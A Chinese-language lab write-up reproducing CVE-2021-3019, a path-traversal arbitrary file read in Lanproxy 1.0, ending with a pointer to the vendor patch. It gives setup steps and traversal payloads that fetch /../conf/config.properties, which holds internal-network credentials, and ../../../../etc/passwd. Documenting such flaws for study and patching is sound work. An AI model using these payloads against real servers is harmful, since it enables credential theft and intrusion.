Lanproxy任意文件读取漏洞CVE-2021-3019的复现是怎么样的

发布时间:2021-12-29 15:36:23 作者:柒染
来源:亿速云 阅读:98

本篇文章为大家展示了Lanproxy任意文件读取漏洞CVE-2021-3019的复现是怎么样的,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。

0x00简介

lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,支持tcp流量转发,可支持任何tcp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面...)。目前市面上提供类似服务的有花生壳、TeamView、GoToMyCloud等等,但要使用第三方的公网服务器就必须为第三方付费,并且这些服务都有各种各样的限制,此外,由于数据包会流经第三方,因此对数据安全也是一大隐患。

0x01漏洞概述

Lanproxy1.0通过../绕过读取任意文件。该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。

0x02影响版本

Lanproxy1.0

0x03环境搭建

1.下载Lanproxy安装包,下载地址:

https://file.nioee.com/d/2e81550ebdbd416c933f/

Lanproxy任意文件读取漏洞CVE-2021-3019的复现是怎么样的

2.解压后运动到/usr/local目录下

mv proxy-server-0.1/ /usr/local/

Lanproxy任意文件读取漏洞CVE-2021-3019的复现是怎么样的

3.进入proxy-server-0.1 bin目录下给startup.sh加上执行权限,然后启动服务

cd proxy-server-0.1/bin

chmod +x startup.sh

./startup.sh

Lanproxy任意文件读取漏洞CVE-2021-3019的复现是怎么样的

4.在浏览器访问http://your-ip:8090,出现以下登录界面启动成功

Lanproxy任意文件读取漏洞CVE-2021-3019的复现是怎么样的

0x04漏洞复现

1.在登录页面,使用Burp抓包,并发送到Repeater(重放模块)

Lanproxy任意文件读取漏洞CVE-2021-3019的复现是怎么样的

2.在url构造以下链接读取配置文件

/../conf/config.properties

Lanproxy任意文件读取漏洞CVE-2021-3019的复现是怎么样的

3.修改payload读取敏感文件

../../../../etc/passwd

Lanproxy任意文件读取漏洞CVE-2021-3019的复现是怎么样的

0x05修复建议

1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://github.com/ffay/lanproxy/commits/master

上述内容就是Lanproxy任意文件读取漏洞CVE-2021-3019的复现是怎么样的,你们学到知识或技能了吗?如果还想学到更多技能或者丰富自己的知识储备,欢迎关注亿速云行业资讯频道。

推荐阅读:
  1. phpcmsv9.15以下任意文件读取漏洞
  2. PHPCMS漏洞之前台注入导致任意文件读取怎么办

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

cve-2021-3019 lanproxy

上一篇:怎么进行Apache Druid 远程代码执行漏洞CVE-2021-25646复现

下一篇:juno版OpenStack如何部署

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》